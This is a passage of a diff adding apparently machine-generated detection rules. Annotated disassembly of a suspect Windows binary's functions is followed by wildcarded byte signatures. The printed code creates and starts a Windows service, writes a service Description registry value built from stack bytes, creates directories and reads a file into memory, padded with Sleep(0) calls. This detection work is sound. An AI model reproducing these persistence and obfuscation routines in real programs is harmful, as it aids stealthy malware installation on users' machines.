53 push ebx + .text:0x00407597 ff1540904000 call dword [0x00409040] ;advapi32.CreateServiceA(advapi32.OpenSCManagerA(0,0,0x000f003f),arg1,arg2,0x000f01ff,272,2,0,local812,0,0,0,0,0) + .text:0x0040759d 8bf8 mov edi,eax + .text:0x0040759f 89bdd0fcffff mov dword [ebp - 816],edi + .text:0x004075a5 6a00 push 0 + .text:0x004075a7 ffd6 call esi ;kernel32.Sleep(0) + .text:0x004075a9 53 push ebx + .text:0x004075aa ff153c904000 call dword [0x0040903c] ;advapi32.LockServiceDatabase(<0x00407559>) + .text:0x004075b0 8985a0fcffff mov dword [ebp - 864],eax + .text:0x004075b6 6a00 push 0 + .text:0x004075b8 ffd6 call esi ;kernel32.Sleep(0) + .text:0x004075ba c785c8fcffff7ca2 mov dword [ebp - 824],0x0040a27c + .text:0x004075c4 6a00 push 0 + .text:0x004075c6 ffd6 call esi ;kernel32.Sleep(0) + .text:0x004075c8 8d8dc8fcffff lea ecx,dword [ebp - 824] + .text:0x004075ce 51 push ecx + .text:0x004075cf 6a01 push 1 + .text:0x004075d1 57 push edi + .text:0x004075d2 ff1538904000 call dword [0x00409038] ;advapi32.ChangeServiceConfig2A(advapi32.CreateServiceA(<0x00407559>,arg1,arg2,0x000f01ff,272,2,0,local812,0,0,0,0,0),1,local828) + .text:0x004075d8 6a00 push 0 + .text:0x004075da ffd6 call esi ;kernel32.Sleep(0) + .text:0x004075dc 8b95a0fcffff mov edx,dword [ebp - 864] + .text:0x004075e2 52 push edx + .text:0x004075e3 ff1534904000 call dword [0x00409034] ;advapi32.UnlockServiceDatabase(advapi32.LockServiceDatabase(<0x00407559>)) + .text:0x004075e9 6a00 push 0 + .text:0x004075eb ffd6 call esi ;kernel32.Sleep(0) + .text:0x004075ed 85ff test edi,edi + .text:0x004075ef 7542 jnz 0x00407633 + .text:0x004075f1 57 push edi + .text:0x004075f2 ffd6 call esi ;kernel32.Sleep(<0x00407597>) + .text:0x004075f4 ff15d4904000 call dword [0x004090d4] ;ntdll.RtlGetLastWin32Error() + .text:0x004075fa 3d31040000 cmp eax,1073 + .text:0x004075ff 7532 jnz 0x00407633 + .text:0x00407601 57 push edi + .text:0x00407602 ffd6 call esi ;kernel32.Sleep(<0x00407597>) + .text:0x00407604 68ff010f00 push 0x000f01ff + .text:0x00407609 8b450c mov eax,dword [ebp + 12] + .text:0x0040760c 50 push eax + .text:0x0040760d 53 push ebx + .text:0x0040760e ff1530904000 call dword [0x00409030] ;advapi32.OpenServiceA(<0x00407559>,arg1,0x000f01ff) + .text:0x00407614 8bf8 mov edi,eax + .text:0x00407616 89bdd0fcffff mov dword [ebp - 816],edi + .text:0x0040761c 6a00 push 0 + .text:0x0040761e ffd6 call esi ;kernel32.Sleep(0) + .text:0x00407620 85ff test edi,edi + .text:0x00407622 0f84ef010000 jz 0x00407817 + .text:0x00407628 6a00 push 0 + .text:0x0040762a 6a00 push 0 + .text:0x0040762c 57 push edi + .text:0x0040762d ff152c904000 call dword [0x0040902c] ;advapi32.StartServiceA(advapi32.OpenServiceA(<0x00407559>,arg1,0x000f01ff),0,0) + .text:0x00407633 loc_00407633: [2 XREFS] + .text:0x00407633 6a00 push 0 + .text:0x00407635 ffd6 call esi ;kernel32.Sleep(0) + .text:0x00407637 6a00 push 0 + .text:0x00407639 6a00 push 0 + .text:0x0040763b 57 push edi + .text:0x0040763c ff152c904000 call dword [0x0040902c] ;advapi32.StartServiceA(<0x00407597>,0,0) + .text:0x00407642 85c0 test eax,eax + .text:0x00407644 0f84cd010000 jz 0x00407817 + .text:0x0040764a 6a00 push 0 + .text:0x0040764c ffd6 call esi ;kernel32.Sleep(0) + .text:0x0040764e b053 mov al,83 + .text:0x00407650 8885a4fcffff mov byte [ebp - 860],al + .text:0x00407656 c685a5fcffff59 mov byte [ebp - 859],89 + .text:0x0040765d 8885a6fcffff mov byte [ebp - 858],al + .text:0x00407663 c685a7fcffff54 mov byte [ebp - 857],84 + .text:0x0040766a c685a8fcffff45 mov byte [ebp - 856],69 + .text:0x00407671 c685a9fcffff4d mov byte [ebp - 855],77 + .text:0x00407678 b15c mov cl,92 + .text:0x0040767a 888daafcffff mov byte [ebp - 854],cl + .text:0x00407680 b243 mov dl,67 + .text:0x00407682 8895abfcffff mov byte [ebp - 853],dl + .text:0x00407688 c685acfcffff75 mov byte [ebp - 852],117 + .text:0x0040768f c685adfcffff72 mov byte [ebp - 851],114 + .text:0x00407696 c685aefcffff72 mov byte [ebp - 850],114 + .text:0x0040769d b365 mov bl,101 + .text:0x0040769f 889daffcffff mov byte [ebp - 849],bl + .text:0x004076a5 c685b0fcffff6e mov byte [ebp - 848],110 + .text:0x004076ac c685b1fcffff74 mov byte [ebp - 847],116 + .text:0x004076b3 8895b2fcffff mov byte [ebp - 846],dl + .text:0x004076b9 c685b3fcffff6f mov byte [ebp - 845],111 + .text:0x004076c0 c685b4fcffff6e mov byte [ebp - 844],110 + .text:0x004076c7 c685b5fcffff74 mov byte [ebp - 843],116 + .text:0x004076ce c685b6fcffff72 mov byte [ebp - 842],114 + .text:0x004076d5 c685b7fcffff6f mov byte [ebp - 841],111 + .text:0x004076dc c685b8fcffff6c mov byte [ebp - 840],108 + .text:0x004076e3 8885b9fcffff mov byte [ebp - 839],al + .text:0x004076e9 889dbafcffff mov byte [ebp - 838],bl + .text:0x004076ef c685bbfcffff74 mov byte [ebp - 837],116 + .text:0x004076f6 888dbcfcffff mov byte [ebp - 836],cl + .text:0x004076fc 8885bdfcffff mov byte [ebp - 835],al + .text:0x00407702 889dbefcffff mov byte [ebp - 834],bl + .text:0x00407708 c685bffcffff72 mov byte [ebp - 833],114 + .text:0x0040770f c685c0fcffff76 mov byte [ebp - 832],118 + .text:0x00407716 c685c1fcffff69 mov byte [ebp - 831],105 + .text:0x0040771d c685c2fcffff63 mov byte [ebp - 830],99 + .text:0x00407724 889dc3fcffff mov byte [ebp - 829],bl + .text:0x0040772a c685c4fcffff73 mov byte [ebp - 828],115 + .text:0x00407731 888dc5fcffff mov byte [ebp - 827],cl + .text:0x00407737 c685c6fcffff00 mov byte [ebp - 826],0 + .text:0x0040773e 6a00 push 0 + .text:0x00407740 ffd6 call esi ;kernel32.Sleep(0) + .text:0x00407742 8d8da4fcffff lea ecx,dword [ebp - 860] + .text:0x00407748 51 push ecx + .text:0x00407749 8d95e4feffff lea edx,dword [ebp - 284] + .text:0x0040774f 52 push edx + .text:0x00407750 8b0dd4aa4000 mov ecx,dword [0x0040aad4] + .text:0x00407756 e815d0ffff call 0x00404770 ;sub_00404770(local288,local864) + .text:0x0040775b 6a00 push 0 + .text:0x0040775d ffd6 call esi ;kernel32.Sleep(0) + .text:0x0040775f 8b450c mov eax,dword [ebp + 12] + .text:0x00407762 50 push eax + .text:0x00407763 8d8de4feffff lea ecx,dword [ebp - 284] + .text:0x00407769 51 push ecx + .text:0x0040776a 8b0dd4aa4000 mov ecx,dword [0x0040aad4] + .text:0x00407770 e83bcfffff call 0x004046b0 ;sub_004046b0(local288,arg1) + .text:0x00407775 6a00 push 0 + .text:0x00407777 ffd6 call esi ;kernel32.Sleep(0) + .text:0x00407779 8d95dcfdffff lea edx,dword [ebp - 548] + .text:0x0040777f 52 push edx + .text:0x00407780 8d85e4feffff lea eax,dword [ebp - 284] + .text:0x00407786 50 push eax + .text:0x00407787 6802000080 push 0x80000002 + .text:0x0040778c ff1520904000 call dword [0x00409020] ;advapi32.RegOpenKeyA(0x80000002,local288,local552) + .text:0x00407792 6a00 push 0 + .text:0x00407794 ffd6 call esi ;kernel32.Sleep(0) + .text:0x00407796 c68594fcffff44 mov byte [ebp - 876],68 + .text:0x0040779d 889d95fcffff mov byte [ebp - 875],bl + .text:0x004077a3 c68596fcffff73 mov byte [ebp - 874],115 + .text:0x004077aa c68597fcffff63 mov byte [ebp - 873],99 + .text:0x004077b1 c68598fcffff72 mov byte [ebp - 872],114 + .text:0x004077b8 c68599fcffff69 mov byte [ebp - 871],105 + .text:0x004077bf c6859afcffff70 mov byte [ebp - 870],112 + .text:0x004077c6 c6859bfcffff74 mov byte [ebp - 869],116 + .text:0x004077cd c6859cfcffff69 mov byte [ebp - 868],105 + .text:0x004077d4 c6859dfcffff6f mov byte [ebp - 867],111 + .text:0x004077db c6859efcffff6e mov byte [ebp - 866],110 + .text:0x004077e2 c6859ffcffff00 mov byte [ebp - 865],0 + .text:0x004077e9 6a00 push 0 + .text:0x004077eb ffd6 call esi ;kernel32.Sleep(0) + .text:0x004077ed 8b5d14 mov ebx,dword [ebp + 20] + .text:0x004077f0 53 push ebx + .text:0x004077f1 ff15c4904000 call dword [0x004090c4] ;kernel32.lstrlenA(arg3) + .text:0x004077f7 50 push eax + .text:0x004077f8 53 push ebx + .text:0x004077f9 6a01 push 1 + .text:0x004077fb 6a00 push 0 + .text:0x004077fd 8d8d94fcffff lea ecx,dword [ebp - 876] + .text:0x00407803 51 push ecx + .text:0x00407804 8b95dcfdffff mov edx,dword [ebp - 548] + .text:0x0040780a 52 push edx + .text:0x0040780b ff1500904000 call dword [0x00409000] ;advapi32.RegSetValueExA(0,local880,0,1,arg3,kernel32.lstrlenA(arg3)) + .text:0x00407811 8b9dd4fcffff mov ebx,dword [ebp - 812] + .text:0x00407817 loc_00407817: [3 XREFS] + .text:0x00407817 c745fcffffffff mov dword [ebp - 4],0xffffffff + .text:0x0040781e e823000000 call 0x00407846 ;sub_00407846() + .text:0x00407823 loc_00407823: [1 XREFS] + .text:0x00407823 8b4df0 mov ecx,dword [ebp - 16] + .text:0x00407826 64890d00000000 fs: mov dword [0x00000000],ecx + .text:0x0040782d 5f pop edi + .text:0x0040782e 5e pop esi + .text:0x0040782f 5b pop ebx + .text:0x00407830 8be5 mov esp,ebp + .text:0x00407832 5d pop ebp + .text:0x00407833 c3 ret + */ + $c33 = { 55 8B EC 6A FF 68 B8 92 40 00 68 90 7E 40 00 64 A1 ?? ?? ?? ?? 50 64 89 25 ?? ?? ?? ?? 81 EC 5C 03 00 00 53 56 57 C6 85 ?? ?? ?? ?? 00 B9 40 00 00 00 33 C0 8D BD ?? ?? ?? ?? F3 AB 66 AB AA 33 DB 53 8B 35 ?? ?? ?? ?? FF D6 68 04 01 00 00 8D 85 ?? ?? ?? ?? 50 53 FF 15 ?? ?? ?? ?? 53 FF D6 C6 85 ?? ?? ?? ?? 25 C6 85 ?? ?? ?? ?? 73 88 9D ?? ?? ?? ?? 53 FF D6 8B 4D ?? 51 8D 95 ?? ?? ?? ?? 52 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 0C 53 FF D6 8D 8D ?? ?? ?? ?? 51 8B 0D ?? ?? ?? ?? E8 ?? ?? ?? ?? 50 8D 95 ?? ?? ?? ?? 52 8D 85 ?? ?? ?? ?? 50 8B 0D ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 74 ?? 53 FF D6 8D 8D ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? 83 C4 04 53 FF D6 53 8D 95 ?? ?? ?? ?? 52 8D 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 53 FF D6 8D 8D ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? 83 C4 04 53 FF D6 B9 41 00 00 00 33 C0 8D BD ?? ?? ?? ?? F3 AB 53 FF D6 8D 95 ?? ?? ?? ?? 52 8D 85 ?? ?? ?? ?? 50 8B 0D ?? ?? ?? ?? E8 ?? ?? ?? ?? 53 FF D6 80 3D ?? ?? ?? ?? 01 0F 84 ?? ?? ?? ?? 53 FF D6 68 88 13 00 00 FF D6 89 9D ?? ?? ?? ?? 33 FF 89 BD ?? ?? ?? ?? 89 9D ?? ?? ?? ?? 89 5D ?? 53 FF D6 68 3F 00 0F 00 53 53 FF 15 ?? ?? ?? ?? 8B D8 89 9D ?? ?? ?? ?? 57 FF D6 85 DB 0F 84 ?? ?? ?? ?? 57 FF D6 57 57 57 57 57 8D 8D ?? ?? ?? ?? 51 57 6A 02 68 10 01 00 00 68 FF 01 0F 00 8B 55 ?? 52 8B 45 ?? 50 53 FF 15 ?? ?? ?? ?? 8B F8 89 BD ?? ?? ?? ?? 6A 00 FF D6 53 FF 15 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 6A 00 FF D6 C7 85 ?? ?? ?? ?? 7C A2 40 00 6A 00 FF D6 8D 8D ?? ?? ?? ?? 51 6A 01 57 FF 15 ?? ?? ?? ?? 6A 00 FF D6 8B 95 ?? ?? ?? ?? 52 FF 15 ?? ?? ?? ?? 6A 00 FF D6 85 FF 75 ?? 57 FF D6 FF 15 ?? ?? ?? ?? 3D 31 04 00 00 75 ?? 57 FF D6 68 FF 01 0F 00 8B 45 ?? 50 53 FF 15 ?? ?? ?? ?? 8B F8 89 BD ?? ?? ?? ?? 6A 00 FF D6 85 FF 0F 84 ?? ?? ?? ?? 6A 00 6A 00 57 FF 15 ?? ?? ?? ?? 6A 00 FF D6 6A 00 6A 00 57 FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 6A 00 FF D6 B0 53 88 85 ?? ?? ?? ?? C6 85 ?? ?? ?? ?? 59 88 85 ?? ?? ?? ?? C6 85 ?? ?? ?? ?? 54 C6 85 ?? ?? ?? ?? 45 C6 85 ?? ?? ?? ?? 4D B1 5C 88 8D ?? ?? ?? ?? B2 43 88 95 ?? ?? ?? ?? C6 85 ?? ?? ?? ?? 75 C6 85 ?? ?? ?? ?? 72 C6 85 ?? ?? ?? ?? 72 B3 65 88 9D ?? ?? ?? ?? C6 85 ?? ?? ?? ?? 6E C6 85 ?? ?? ?? ?? 74 88 95 ?? ?? ?? ?? C6 85 ?? ?? ?? ?? 6F C6 85 ?? ?? ?? ?? 6E C6 85 ?? ?? ?? ?? 74 C6 85 ?? ?? ?? ?? 72 C6 85 ?? ?? ?? ?? 6F C6 85 ?? ?? ?? ?? 6C 88 85 ?? ?? ?? ?? 88 9D ?? ?? ?? ?? C6 85 ?? ?? ?? ?? 74 88 8D ?? ?? ?? ?? 88 85 ?? ?? ?? ?? 88 9D ?? ?? ?? ?? C6 85 ?? ?? ?? ?? 72 C6 85 ?? ?? ?? ?? 76 C6 85 ?? ?? ?? ?? 69 C6 85 ?? ?? ?? ?? 63 88 9D ?? ?? ?? ?? C6 85 ?? ?? ?? ?? 73 88 8D ?? ?? ?? ?? C6 85 ?? ?? ?? ?? 00 6A 00 FF D6 8D 8D ?? ?? ?? ?? 51 8D 95 ?? ?? ?? ?? 52 8B 0D ?? ?? ?? ?? E8 ?? ?? ?? ?? 6A 00 FF D6 8B 45 ?? 50 8D 8D ?? ?? ?? ?? 51 8B 0D ?? ?? ?? ?? E8 ?? ?? ?? ?? 6A 00 FF D6 8D 95 ?? ?? ?? ?? 52 8D 85 ?? ?? ?? ?? 50 68 02 00 00 80 FF 15 ?? ?? ?? ?? 6A 00 FF D6 C6 85 ?? ?? ?? ?? 44 88 9D ?? ?? ?? ?? C6 85 ?? ?? ?? ?? 73 C6 85 ?? ?? ?? ?? 63 C6 85 ?? ?? ?? ?? 72 C6 85 ?? ?? ?? ?? 69 C6 85 ?? ?? ?? ?? 70 C6 85 ?? ?? ?? ?? 74 C6 85 ?? ?? ?? ?? 69 C6 85 ?? ?? ?? ?? 6F C6 85 ?? ?? ?? ?? 6E C6 85 ?? ?? ?? ?? 00 6A 00 FF D6 8B 5D ?? 53 FF 15 ?? ?? ?? ?? 50 53 6A 01 6A 00 8D 8D ?? ?? ?? ?? 51 8B 95 ?? ?? ?? ?? 52 FF 15 ?? ?? ?? ?? 8B 9D ?? ?? ?? ?? C7 45 ?? FF FF FF FF E8 ?? ?? ?? ?? 8B 4D ?? 64 89 0D ?? ?? ?? ?? 5F 5E 5B 8B E5 5D C3 } + /* +function at 0x004065a0@9324d1a8ae37a36ae560c37448c9705a with 1 features: + - create directory + .text:0x004065a0 + .text:0x004065a0 FUNC: int cdecl sub_004065a0( int arg0, ) [2 XREFS] + .text:0x004065a0 + .text:0x004065a0 Stack Variables: (offset from initial top of stack) + .text:0x004065a0 4: int arg0 + .text:0x004065a0 -259: int local259 + .text:0x004065a0 -260: int local260 + .text:0x004065a0 -272: int local272 + .text:0x004065a0 + .text:0x004065a0 81ec04010000 sub esp,260 + .text:0x004065a6 53 push ebx + .text:0x004065a7 56 push esi + .text:0x004065a8 57 push edi + .text:0x004065a9 b940000000 mov ecx,64 + .text:0x004065ae 33c0 xor eax,eax + .text:0x004065b0 8d7c240d lea edi,dword [esp + 13] + .text:0x004065b4 c644240c00 mov byte [esp + 12],0 + .text:0x004065b9 8b3578904000 mov esi,dword [0x00409078] + .text:0x004065bf f3ab rep: stosd + .text:0x004065c1 66ab stosd + .text:0x004065c3 6a00 push 0 + .text:0x004065c5 aa stosb + .text:0x004065c6 ffd6 call esi ;kernel32.Sleep(0) + .text:0x004065c8 6a00 push 0 + .text:0x004065ca ffd6 call esi ;kernel32.Sleep(0) + .text:0x004065cc 8b9c2414010000 mov ebx,dword [esp + 276] + .text:0x004065d3 8b0dd4aa4000 mov ecx,dword [0x0040aad4] + .text:0x004065d9 53 push ebx + .text:0x004065da 33ff xor edi,edi + .text:0x004065dc e80fe1ffff call 0x004046f0 ;sub_004046f0(arg0) + .text:0x004065e1 85c0 test eax,eax + .text:0x004065e3 765e jbe 0x00406643 + .text:0x004065e5 55 push ebp + .text:0x004065e6 8b2d24914000 mov ebp,dword [0x00409124] + .text:0x004065ec loc_004065ec: [1 XREFS] + .text:0x004065ec 803c1f5c cmp byte [edi + ebx],92 + .text:0x004065f0 753f jnz 0x00406631 + .text:0x004065f2 6a00 push 0 + .text:0x004065f4 ffd6 call esi ;kernel32.Sleep(0) + .text:0x004065f6 8b0dd4aa4000 mov ecx,dword [0x0040aad4] + .text:0x004065fc 57 push edi + .text:0x004065fd 8d442414 lea eax,dword [esp + 20] + .text:0x00406601 53 push ebx + .text:0x00406602 50 push eax + .text:0x00406603 e858e0ffff call 0x00404660 ;sub_00404660(local260,edx,0,local260) + .text:0x00406608 6a00 push 0 + .text:0x0040660a ffd6 call esi ;kernel32.Sleep(0) + .text:0x0040660c 8d4c2410 lea ecx,dword [esp + 16] + .text:0x00406610 6a00 push 0 + .text:0x00406612 51 push ecx + .text:0x00406613 e8ae180000 call 0x00407ec6 ;msvcrt._access(local272,0) + .text:0x00406618 83c408 add esp,8 + .text:0x0040661b 83f8ff cmp eax,0xffffffff + .text:0x0040661e 7511 jnz 0x00406631 + .text:0x00406620 6a00 push 0 + .text:0x00406622 ffd6 call esi ;kernel32.Sleep(0) + .text:0x00406624 8d542410 lea edx,dword [esp + 16] + .text:0x00406628 6a00 push 0 + .text:0x0040662a 52 push edx + .text:0x0040662b ffd5 call ebp ;kernel32.CreateDirectoryA(local272,0) + .text:0x0040662d 6a00 push 0 + .text:0x0040662f ffd6 call esi ;kernel32.Sleep(0) + .text:0x00406631 loc_00406631: [2 XREFS] + .text:0x00406631 8b0dd4aa4000 mov ecx,dword [0x0040aad4] + .text:0x00406637 53 push ebx + .text:0x00406638 47 inc edi + .text:0x00406639 e8b2e0ffff call 0x004046f0 ;sub_004046f0(arg0) + .text:0x0040663e 3bf8 cmp edi,eax + .text:0x00406640 72aa jc 0x004065ec + .text:0x00406642 5d pop ebp + .text:0x00406643 loc_00406643: [1 XREFS] + .text:0x00406643 5f pop edi + .text:0x00406644 5e pop esi + .text:0x00406645 5b pop ebx + .text:0x00406646 81c404010000 add esp,260 + .text:0x0040664c c3 ret + */ + $c34 = { 81 EC 04 01 00 00 53 56 57 B9 40 00 00 00 33 C0 8D 7C 24 ?? C6 44 24 ?? 00 8B 35 ?? ?? ?? ?? F3 AB 66 AB 6A 00 AA FF D6 6A 00 FF D6 8B 9C 24 ?? ?? ?? ?? 8B 0D ?? ?? ?? ?? 53 33 FF E8 ?? ?? ?? ?? 85 C0 76 ?? 55 8B 2D ?? ?? ?? ?? 80 3C 1F 5C 75 ?? 6A 00 FF D6 8B 0D ?? ?? ?? ?? 57 8D 44 24 ?? 53 50 E8 ?? ?? ?? ?? 6A 00 FF D6 8D 4C 24 ?? 6A 00 51 E8 ?? ?? ?? ?? 83 C4 08 83 F8 FF 75 ?? 6A 00 FF D6 8D 54 24 ?? 6A 00 52 FF D5 6A 00 FF D6 8B 0D ?? ?? ?? ?? 53 47 E8 ?? ?? ?? ?? 3B F8 72 ?? 5D 5F 5E 5B 81 C4 04 01 00 00 C3 } + /* +function at 0x004029f0@9324d1a8ae37a36ae560c37448c9705a with 3 features: + - check if file exists + - get file size + - read file on Windows + .text:0x004029f0 + .text:0x004029f0 FUNC: int cdecl sub_004029f0( int arg0, int arg1, int arg2, int arg3, ) [4 XREFS] + .text:0x004029f0 + .text:0x004029f0 Stack Variables: (offset from initial top of stack) + .text:0x004029f0 16: int arg3 + .text:0x004029f0 12: int arg2 + .text:0x004029f0 8: int arg1 + .text:0x004029f0 4: int arg0 + .text:0x004029f0 -51: int local51 + .text:0x004029f0 -52: int local52 + .text:0x004029f0 -56: int local56 + .text:0x004029f0 -57: int local57 + .text:0x004029f0 -58: int local58 + .text:0x004029f0 -59: int local59 + .text:0x004029f0 -60: int local60 + .text:0x004029f0 -61: int local61 + .text:0x004029f0 -62: int local62 + .text:0x004029f0 -63: int local63 + .text:0x004029f0 -64: int local64 + .text:0x004029f0 -65: int local65 + .text:0x004029f0 -66: int local66 + .text:0x004029f0 -67: int local67 + .text:0x004029f0 -68: int local68 + .text:0x004029f0 -70: int local70 + .text:0x004029f0 -71: int local71 + .text:0x004029f0 -72: int local72 + .text:0x004029f0 -73: int local73 + .text:0x004029f0 -74: int local74 + .text:0x004029f0 -75: int local75 + .text:0x004029f0 -76: int local76 + .text:0x004029f0 -80: int local80 + .text:0x004029f0 -84: int local84 + .text:0x004029f0 -88: int local88 + .text:0x004029f0 + .text:0x004029f0 83ec58 sub esp,88 + .text:0x004029f3 8b1530ac4000 mov edx,dword [0x0040ac30] + .text:0x004029f9 b031 mov al,49 + .text:0x004029fb 8844241a mov byte [esp + 26],al + .text:0x004029ff 8844241f mov byte [esp + 31],al + .text:0x00402a03 a020ac4000 mov al,byte [0x0040ac20] + .text:0x00402a08 b156 mov cl,86 + .text:0x00402a0a 88442408 mov byte [esp + 8],al + .text:0x00402a0e 8b049524ac4000 mov eax,dword [0x0040ac24 + edx * 4] + .text:0x00402a15 53 push ebx + .text:0x00402a16 89442404 mov dword [esp + 4],eax + .text:0x00402a1a a1bca94000 mov eax,dword [0x0040a9bc] + .text:0x00402a1f 55 push ebp + .text:0x00402a20 884c241c mov byte [esp + 28],cl + .text:0x00402a24 884c2426 mov byte [esp + 38],cl + .text:0x00402a28 8a0d10ac4000 mov cl,byte [0x0040ac10] + .text:0x00402a2e 33ed xor ebp,ebp + .text:0x00402a30 b353 mov bl,83 + .text:0x00402a32 56 push esi + .text:0x00402a33 8b3578904000 mov esi,dword [0x00409078] + .text:0x00402a39 c644242149 mov byte [esp + 33],73 + .text:0x00402a3e 85c0 test eax,eax + .text:0x00402a40 c644242244 mov byte [esp + 34],68 + .text:0x00402a45 c64424233a mov byte [esp + 35],58 + .text:0x00402a4a c644242432 mov byte [esp + 36],50 + .text:0x00402a4f c644242530 mov byte [esp + 37],48 + .text:0x00402a54 c644242733 mov byte [esp + 39],51 + .text:0x00402a59 c64424282d mov byte [esp + 40],45 + .text:0x00402a5e 885c2429 mov byte [esp + 41],bl + .text:0x00402a62 c644242c00 mov byte [esp + 44],0 + .text:0x00402a67 884c2410 mov byte [esp + 16],cl + .text:0x00402a6b 0f8570010000 jnz 0x00402be1 + .text:0x00402a71 8b4c246c mov ecx,dword [esp + 108] + .text:0x00402a75 51 push ecx + .text:0x00402a76 e8d5feffff call 0x00402950 ;sub_00402950(0,0,arg1,arg1) + .text:0x00402a7b 83c404 add esp,4 + .text:0x00402a7e 55 push ebp + .text:0x00402a7f ffd6 call esi ;kernel32.Sleep(0) + .text:0x00402a81 68b8a84000 push 0x0040a8b8 + .text:0x00402a86 ff15bc904000 call dword [0x004090bc] ;kernel32.GetFileAttributesA(0x0040a8b8) + .text:0x00402a8c 83f8ff cmp eax,0xffffffff + .text:0x00402a8f 7475 jz 0x00402b06 + .text:0x00402a91 57 push edi + .text:0x00402a92 b90c000000 mov ecx,12 + .text:0x00402a97 33c0 xor eax,eax + .text:0x00402a99 8d7c2435 lea edi,dword [esp + 53] + .text:0x00402a9d c644243400 mov byte [esp + 52],0 + .text:0x00402aa2 8d54241c lea edx,dword [esp + 28] + .text:0x00402aa6 f3ab rep: stosd + .text:0x00402aa8 52 push edx + .text:0x00402aa9 68b8a84000 push 0x0040a8b8 + .text:0x00402aae aa stosb + .text:0x00402aaf 885c2424 mov byte [esp + 36],bl + .text:0x00402ab3 885c2425 mov byte [esp + 37],bl + .text:0x00402ab7 885c2426 mov byte [esp + 38],bl + .text:0x00402abb 885c2427 mov byte [esp + 39],bl + .text:0x00402abf 885c2428 mov byte [esp + 40],bl + .text:0x00402ac3 885c2429 mov byte [esp + 41],bl + .text:0x00402ac7 c644242a00 mov byte [esp + 42],0 + .text:0x00402acc e8bffcffff call 0x00402790 ;sub_00402790(0x0040a8b8,local76) + .text:0x00402ad1 83c408 add esp,8 + .text:0x00402ad4 85c0 test eax,eax + .text:0x00402ad6 5f pop edi + .text:0x00402ad7 742d jz 0x00402b06 + .text:0x00402ad9 8b0dd4aa4000 mov ecx,dword [0x0040aad4] + .text:0x00402adf 83c006 add eax,6 + .text:0x00402ae2 50 push eax + .text:0x00402ae3 8d442434 lea eax,dword [esp + 52] + .text:0x00402ae7 50 push eax + .text:0x00402ae8 e8831c0000 call 0x00404770 ;sub_00404770(local52,sub_00402790(0x0040a8b8,local76)) + .text:0x00402aed 8d4c2420 lea ecx,dword [esp + 32] + .text:0x00402af1 8d542430 lea edx,dword [esp + 48] + .text:0x00402af5 51 push ecx + .text:0x00402af6 8b0dd4aa4000 mov ecx,dword [0x0040aad4] + .text:0x00402afc 52 push edx + .text:0x00402afd e8fe1c0000 call 0x00404800 ;sub_00404800(0,local52,local68) + .text:0x00402b02 85c0 test eax,eax + .text:0x00402b04 7418 jz 0x00402b1e + .text:0x00402b06 loc_00402b06: [2 XREFS] + .text:0x00402b06 6a01 push 1 + .text:0x00402b08 68b8a84000 push 0x0040a8b8 + .text:0x00402b0d e83efdffff call 0x00402850 ;sub_00402850() + .text:0x00402b12 83c408 add esp,8 + .text:0x00402b15 33c0 xor eax,eax + .text:0x00402b17 5e pop esi + .text:0x00402b18 5d pop ebp + .text:0x00402b19 5b pop ebx + .text:0x00402b1a 83c458 add esp,88 + .text:0x00402b1d c3 ret + .text:0x00402b1e loc_00402b1e: [1 XREFS] + .text:0x00402b1e 6a00 push 0 + .text:0x00402b20 ffd6 call esi ;kernel32.Sleep(0) + .text:0x00402b22 6a00 push 0 + .text:0x00402b24 6880000000 push 128 + .text:0x00402b29 6a03 push 3 + .text:0x00402b2b 6a00 push 0 + .text:0x00402b2d 6a00 push 0 + .text:0x00402b2f 6800000080 push 0x80000000 + .text:0x00402b34 68b8a84000 push 0x0040a8b8 + .text:0x00402b39 ff15ac904000 call dword [0x004090ac] ;kernel32.CreateFileA(0x0040a8b8,0x80000000,0,0,3,128,0) + .text:0x00402b3f 83f8ff cmp eax,0xffffffff + .text:0x00402b42 a3aca84000 mov dword [0x0040a8ac],eax + .text:0x00402b47 7509 jnz 0x00402b52 + .text:0x00402b49 5e pop esi + .text:0x00402b4a 5d pop ebp + .text:0x00402b4b 33c0 xor eax,eax + .text:0x00402b4d 5b pop ebx + .text:0x00402b4e 83c458 add esp,88 + .text:0x00402b51 c3 ret + .text:0x00402b52 loc_00402b52: [1 XREFS] + .text:0x00402b52 6a00 push 0 + .text:0x00402b54 ffd6 call esi ;kernel32.Sleep(0) + .text:0x00402b56 a1aca84000 mov eax,dword [0x0040a8ac] + .text:0x00402b5b 6a00 push 0 + .text:0x00402b5d 50 push eax + .text:0x00402b5e ff15b0904000 call dword [0x004090b0] ;kernel32.GetFileSize(kernel32.CreateFileA(0x0040a8b8,0x80000000,0,0,3,128,0),0) + .text:0x00402b64 6a04 push 4 + .text:0x00402b66 6800300000 push 0x00003000 + .text:0x00402b6b 50 push eax + .text:0x00402b6c 6a00 push 0 + .text:0x00402b6e a3a4a84000 mov dword [0x0040a8a4],eax + .text:0x00402b73 ff1580904000 call dword [0x00409080] ;kernel32.VirtualAlloc(0,kernel32.GetFileSize(<0x00402b39>,0),0x00003000,4) + .text:0x00402b79 6a00 push 0 + .text:0x00402b7b a3b4a84000 mov dword [0x0040a8b4],eax + .text:0x00402b80 ffd6 call esi ;kernel32.Sleep(0) + .text:0x00402b82 8b0da4a84000 mov ecx,dword [0x0040a8a4] + .text:0x00402b88 8b15b4a84000 mov edx,dword [0x0040a8b4] + .text:0x00402b8e a1aca84000 mov eax,dword [0x0040a8ac] + .text:0x00402b93 6a00 push 0 + .text:0x00402b95 68a8a84000 push 0x0040a8a8 + .text:0x00402b9a 51 push ecx + .text:0x00402b9b 52 push edx + .text:0x00402b9c 50 push eax + .text:0x00402b9d ff15b4904000 call dword [0x004090b4] ;kernel32.ReadFile(<0x00402b39>,kernel32.VirtualAlloc(0,<0x00402b5e>,0x00003000,4),<0x00402b5e>,0x0040a8a8,0) + .text:0x00402ba3 6a00 push 0 + .text:0x00402ba5 ffd6 call esi ;kernel32.Sleep(0) + .text:0x00402ba7 8b0daca84000 mov ecx,dword [0x0040a8ac] + .text:0x00402bad 51 push ecx + .text:0x00402bae ff1588904000 call dword [0x00409088] ;kernel32.CloseHandle(<0x00402b39>) + .text:0x00402bb4 6a00 push 0 + .text:0x00402bb6 ffd6 call esi ;kernel32.Sleep(0) + 